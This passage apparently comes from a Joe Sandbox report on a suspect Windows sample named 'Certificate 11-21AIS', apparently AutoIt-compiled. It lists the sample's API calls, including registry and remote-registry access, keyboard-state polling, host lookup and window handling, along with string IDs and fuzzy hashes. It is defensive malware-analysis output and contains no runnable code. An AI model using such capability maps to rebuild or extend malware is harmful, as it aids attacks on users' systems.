                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                              • String ID: (
                                                                              • API String ID: 2598888154-3887548279
                                                                              • Opcode ID: 1dc3846190fedd00c8f26ac37c6a7f1a7c23626e919b46979b5b8d00e9efc084
                                                                              • Instruction ID: 817d5a1418f2ff514843761d36969ef7b17f61ec5074262cd7ef57c13481725c
                                                                              • Opcode Fuzzy Hash: 1dc3846190fedd00c8f26ac37c6a7f1a7c23626e919b46979b5b8d00e9efc084
                                                                              • Instruction Fuzzy Hash: 94514879A04309AFCB15CFA8D885EAEBBB9EF49710F14841DF95AA7250C731A841CB90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 2889450990-2391861430
                                                                              • Opcode ID: 99f74c9adefb44c8b327a5d8b4c696b7d6416df9156f39b367794af960c381ab
                                                                              • Instruction ID: 4468b057c4cb932553cb740524556cf1e3686dd9901f7b5efd9cfa9259e8d863
                                                                              • Opcode Fuzzy Hash: 99f74c9adefb44c8b327a5d8b4c696b7d6416df9156f39b367794af960c381ab
                                                                              • Instruction Fuzzy Hash: D6515F71900109AACF15EBE4CD46FEEB778FF05344F104169F505B21A2EB31AE99EB62
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 2889450990-3420473620
                                                                              • Opcode ID: e981fdec96c04d6e08071191298f8487f814082df35ace02802a4fdfb732642f
                                                                              • Instruction ID: 89230d4c728f325f5502ff22ff5cbf4e5e9d7984f736e433156690a42b06982e
                                                                              • Opcode Fuzzy Hash: e981fdec96c04d6e08071191298f8487f814082df35ace02802a4fdfb732642f
                                                                              • Instruction Fuzzy Hash: FD518071900109AADF15EBE4CD46FEEB778FF04344F104169F509B2192EA34AF99DB62
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009055D7
                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00905664
                                                                              • GetMenuItemCount.USER32(00981708), ref: 009056ED
                                                                              • DeleteMenu.USER32(00981708,00000005,00000000,000000F5,?,?), ref: 0090577D
                                                                              • DeleteMenu.USER32(00981708,00000004,00000000), ref: 00905785
                                                                              • DeleteMenu.USER32(00981708,00000006,00000000), ref: 0090578D
                                                                              • DeleteMenu.USER32(00981708,00000003,00000000), ref: 00905795
                                                                              • GetMenuItemCount.USER32(00981708), ref: 0090579D
                                                                              • SetMenuItemInfoW.USER32(00981708,00000004,00000000,00000030), ref: 009057D3
                                                                              • GetCursorPos.USER32(?), ref: 009057DD
                                                                              • SetForegroundWindow.USER32(00000000), ref: 009057E6
                                                                              • TrackPopupMenuEx.USER32(00981708,00000000,?,00000000,00000000,00000000), ref: 009057F9
                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00905805
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 3993528054-0
                                                                              • Opcode ID: e68dcc344b3edfa62d9022bee724c13cdc7e8d46033baae7f378fe07eca23136
                                                                              • Instruction ID: 8aee37765b579f32c04b51145e034f3947bfed64aa3b900bd68d862bce4f816f
                                                                              • Opcode Fuzzy Hash: e68dcc344b3edfa62d9022bee724c13cdc7e8d46033baae7f378fe07eca23136
                                                                              • Instruction Fuzzy Hash: A1710374641A05BEFB209B14CC49FABBF6DFF40368F254205F619AA1D1CB725850DF94
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008FA1DC
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008FA211
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008FA22D
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008FA249
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008FA273
                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 008FA29B
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008FA2A6
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008FA2AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 1687751970-22481851
                                                                              • Opcode ID: 8a6d321605a3556a46e4882fe487834d3ac28f961990d2db348a9d1a573ec936
                                                                              • Instruction ID: f78ac7668bd2df6d6f26a949ce2a4d37b4d86e1a0a3d6197d252fca948f657b5
                                                                              • Opcode Fuzzy Hash: 8a6d321605a3556a46e4882fe487834d3ac28f961990d2db348a9d1a573ec936
                                                                              • Instruction Fuzzy Hash: 44410676C1022DABDF25EBA8DC85EEDB7B8FF14710F044029E905A3160EB719E45DB51
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 3964851224-909552448
                                                                              • Opcode ID: f5bcf82e28a97d76f738f5e51c5e87b5b2ad421a0863638e7b61817f4865da9c
                                                                              • Instruction ID: 6d326c10a73273d1a4287fd64f4841cdc822683c23ff2b9505dd2b3db088f22c
                                                                              • Opcode Fuzzy Hash: f5bcf82e28a97d76f738f5e51c5e87b5b2ad421a0863638e7b61817f4865da9c
                                                                              • Instruction Fuzzy Hash: DC41523116035A8BDF10EF14E851AEB33A5FF62340F508859FC595B29AEB74DE0ACB11
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009336F4,00000010,?,Bad directive syntax error,0095DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009025D6
                                                                              • LoadStringW.USER32(00000000,?,009336F4,00000010), ref: 009025DD
                                                                              • _wprintf.LIBCMT ref: 00902610
                                                                              • __swprintf.LIBCMT ref: 00902632
                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009026A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                              • API String ID: 1080873982-4153970271
                                                                              • Opcode ID: bba738fe8468ae6a54f4540fdc13d3f61588c50288b13e14cc0bddd0ddd0b6ba
                                                                              • Instruction ID: 36cc17de1aacd757ab034b881bad912ab713d07cac0f6731056169a4c94e3f30
                                                                              • Opcode Fuzzy Hash: bba738fe8468ae6a54f4540fdc13d3f61588c50288b13e14cc0bddd0ddd0b6ba
                                                                              • Instruction Fuzzy Hash: B421213290021AAFCF11AB94CC4AFEE7B79FF19304F04445AF515A60A3EA71E654EB51
                                                                              APIs
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00907B42
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00907B58
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00907B69
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00907B7B
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00907B8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: SendString
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 890592661-1007645807
                                                                              • Opcode ID: f65568ebd26792ca31cc55ab3bb08a4afd5d1d2eec2ea12dcb10fd1d746950d4
                                                                              • Instruction ID: d36b1ae17f65dbd8406a381fec463218ecfc4c6c5ee09d7303b17a32ed3db09c
                                                                              • Opcode Fuzzy Hash: f65568ebd26792ca31cc55ab3bb08a4afd5d1d2eec2ea12dcb10fd1d746950d4
                                                                              • Instruction Fuzzy Hash: A211C8A29502697DD724B3A5CC4AEFFBA7CFBD1B14F00451DB415E20C1EE709A45C5B1
APIs
• timeGetTime.WINMM ref: 00907794
  • Part of subcall function 008DDC38: timeGetTime.WINMM(?,75C0B400,009358AB), ref: 008DDC3C
• Sleep.KERNEL32(0000000A), ref: 009077C0
• EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009077E4
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00907806
• SetActiveWindow.USER32 ref: 00907825
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00907833
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00907852
• Sleep.KERNEL32(000000FA), ref: 0090785D
• IsWindow.USER32 ref: 00907869
• EndDialog.USER32(00000000), ref: 0090787A
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
APIs
  • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
  • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
• CoInitialize.OLE32(00000000), ref: 0091034B
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009103DE
• SHGetDesktopFolder.SHELL32(?), ref: 009103F2
• CoCreateInstance.OLE32(0094DA8C,00000000,00000001,00973CF8,?), ref: 0091043E
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009104AD
• CoTaskMemFree.OLE32(?,?), ref: 00910505
• _memset.LIBCMT ref: 00910542
• SHBrowseForFolderW.SHELL32(?), ref: 0091057E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009105A1
• CoTaskMemFree.OLE32(00000000), ref: 009105A8
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009105DF
• CoUninitialize.OLE32(00000001,00000000), ref: 009105E1
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
APIs
• GetKeyboardState.USER32(?), ref: 00902ED6
• SetKeyboardState.USER32(?), ref: 00902F41
• GetAsyncKeyState.USER32(000000A0), ref: 00902F61
• GetKeyState.USER32(000000A0), ref: 00902F78
• GetAsyncKeyState.USER32(000000A1), ref: 00902FA7
• GetKeyState.USER32(000000A1), ref: 00902FB8
• GetAsyncKeyState.USER32(00000011), ref: 00902FE4
• GetKeyState.USER32(00000011), ref: 00902FF2
• GetAsyncKeyState.USER32(00000012), ref: 0090301B
• GetKeyState.USER32(00000012), ref: 00903029
• GetAsyncKeyState.USER32(0000005B), ref: 00903052
• GetKeyState.USER32(0000005B), ref: 00903060
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 008FED1E
• GetWindowRect.USER32(00000000,?), ref: 008FED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008FED8E
• GetDlgItem.USER32(?,00000002), ref: 008FED99
• GetWindowRect.USER32(00000000,?), ref: 008FEDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008FEE01
• GetDlgItem.USER32(?,000003E9), ref: 008FEE0F
• GetWindowRect.USER32(00000000,?), ref: 008FEE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008FEE63
• GetDlgItem.USER32(?,000003EA), ref: 008FEE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008FEE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 008FEE9B
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 008DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008DB759,?,00000000,?,?,?,?,008DB72B,00000000,?), ref: 008DBA58
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008DB72B), ref: 008DB7F6
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,008DB72B,00000000,?,?,008DB2EF,?,?), ref: 008DB88D
• DestroyAcceleratorTable.USER32(00000000), ref: 0093D8A6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008DB72B,00000000,?,?,008DB2EF,?,?), ref: 0093D8D7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008DB72B,00000000,?,?,008DB2EF,?,?), ref: 0093D8EE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008DB72B,00000000,?,?,008DB2EF,?,?), ref: 0093D90A
• DeleteObject.GDI32(00000000), ref: 0093D91C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
APIs
  • Part of subcall function 008DB526: GetWindowLongW.USER32(?,000000EB), ref: 008DB537
• GetSysColor.USER32(0000000F), ref: 008DB438
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
APIs
• CharLowerBuffW.USER32(0095DC00,0095DC00,0095DC00), ref: 0090D7CE
• GetDriveTypeW.KERNEL32(?,00973A70,00000061), ref: 0090D898
• _wcscpy.LIBCMT ref: 0090D8C2
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
APIs
• __swprintf.LIBCMT ref: 008C93AB
• __itow.LIBCMT ref: 008C93DF
  • Part of subcall function 008E1557: _xtow@16.LIBCMT ref: 008E1578
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0092A259
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0092A260
                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0092A273
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0092A27B
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0092A286
                                                                              • DeleteDC.GDI32(00000000), ref: 0092A28F
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0092A299
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0092A2AD
                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0092A2B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                              • String ID: static
                                                                              • API String ID: 2559357485-2160076837
                                                                              • Opcode ID: 31839f96aa4b4e1b0a36614256406b482c37c63a5183c37daf26b243c955b764
                                                                              • Instruction ID: 149dd96e86cdc167b4ada6894dfc8284e9311a6b7191d3628b7b4d791bd965da
                                                                              • Opcode Fuzzy Hash: 31839f96aa4b4e1b0a36614256406b482c37c63a5183c37daf26b243c955b764
                                                                              • Instruction Fuzzy Hash: 60318E36115124EBDF119FA4EC49FEA3B6DFF0E360F110214FA29A61A0C735D811EBA5
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 2620052-3771769585
                                                                              • Opcode ID: b95a9bb31606bb2b12f95b75217f8a464ac95382c6a2740c49deeb47f672ee47
                                                                              • Instruction ID: fbd8732181c27da189bc01c90af9a0168b0750fe4bc7c033ce6eb1388e815d11
                                                                              • Opcode Fuzzy Hash: b95a9bb31606bb2b12f95b75217f8a464ac95382c6a2740c49deeb47f672ee47
                                                                              • Instruction Fuzzy Hash: CE113676A08215AFCB24AB74EC0AEDA77BCEF41720F000165F245E60C1EFB4EAC09B51
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008E5047
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • __gmtime64_s.LIBCMT ref: 008E50E0
                                                                              • __gmtime64_s.LIBCMT ref: 008E5116
                                                                              • __gmtime64_s.LIBCMT ref: 008E5133
                                                                              • __allrem.LIBCMT ref: 008E5189
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E51A5
                                                                              • __allrem.LIBCMT ref: 008E51BC
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E51DA
                                                                              • __allrem.LIBCMT ref: 008E51F1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E520F
                                                                              • __invoke_watson.LIBCMT ref: 008E5280
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                              • String ID:
                                                                              • API String ID: 384356119-0
                                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                              • Instruction ID: 929be93cc074400216a79a274c6eda0f4636eec65b2b1f0b558b5cbbbe27db5d
                                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                              • Instruction Fuzzy Hash: 5471E871A00F5BABD714AE7ECC41B6AB7A8FF12768F144229FA10D6681E770D9408BD1
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00904DF8
                                                                              • GetMenuItemInfoW.USER32(00981708,000000FF,00000000,00000030), ref: 00904E59
                                                                              • SetMenuItemInfoW.USER32(00981708,00000004,00000000,00000030), ref: 00904E8F
                                                                              • Sleep.KERNEL32(000001F4), ref: 00904EA1
                                                                              • GetMenuItemCount.USER32(?), ref: 00904EE5
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00904F01
                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00904F2B
                                                                              • GetMenuItemID.USER32(?,?), ref: 00904F70
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00904FB6
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00904FCA
                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00904FEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                              • String ID:
                                                                              • API String ID: 4176008265-0
                                                                              • Opcode ID: 0616bd048e4eed00f6f89effbf4e869e3e012f711d9754184ef8b07df8742ae8
                                                                              • Instruction ID: 8bf3bd496085e4f441aca642b78794a4db9ce07e91ea201bf1a91c7a4396a1ae
